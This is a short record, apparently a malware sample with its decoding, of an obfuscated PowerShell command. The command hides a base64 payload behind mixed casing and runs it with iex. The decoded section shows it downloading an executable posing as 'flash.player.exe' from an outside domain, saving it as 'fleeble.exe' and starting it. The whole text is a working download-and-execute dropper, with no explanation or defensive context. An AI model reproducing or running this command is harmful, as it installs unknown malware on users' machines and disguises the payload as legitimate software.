iex([SySTEM.TExT.ENCoding]::uTF8.GeTstrINg([sYStEM.CONveRt]::frombAsE64strInG('CihOZXctT2JqZWN0IFNZc3RlbS5uZVQud0VCY2xJZW5UKS5ET3dObG9hZEZpbEUoJ2h0dHA6Ly9hbGxiZXN0dW5sb2NrZXJwcm8uY29tL2ZsYXNoLnBsYXllci5leGUnLCdmbGVlYmxlLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2ZsZWVibGUuZXhlJwoK')));exit

##### B64 CONTENT #####


(New-Object SYstem.neT.wEBclIenT).DOwNloadFilE('http://allbestunlockerpro.com/flash.player.exe','fleeble.exe');Start-Process 'fleeble.exe'

